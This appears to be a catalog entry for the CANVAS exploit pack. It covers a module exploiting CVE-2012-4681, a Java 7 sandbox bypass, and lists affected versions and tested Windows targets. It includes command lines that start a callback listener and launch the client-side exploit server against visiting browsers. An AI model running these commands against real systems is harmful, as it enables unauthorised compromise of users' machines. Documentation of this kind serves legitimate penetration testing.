| Name | java_forName_getField |
| CVE | CVE-2012-4681 |
| Exploit Pack | CANVAS |
| Description | Java forName/getField Method Invocation Sandbox Bypass |
| Notes | CVE Name: CVE-2012-4681 VENDOR: Sun Notes: There is a method invocation vulnerability using sun.awt.SunToolkit.getField() This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox. Affected versions JDK and JRE 7 Update 6 and earlier Note: this does not work under JRE 6 due to the getField() function not working correctly. Tested on: - Windows 7 SP1 with JDK/JRE 7 and 7 update 6 - Windows XP SP3 with JDK/JRE 7 and 7 update 6 Needs more testing (likley to work on other targets) To run from command line, first start the listener (UNIVERSAL): python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17 And then run the exploit from clientd: python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_forName_getField -O allowed_recon_modules:js_recon -O auto_detect_exploits:0 Repeatability: Infinite (client side - no crash) References: http://pastie.org/4594319 Date public: 07/26/2012 |
| Learn more about the CANVAS Exploit Pack here: CANVAS |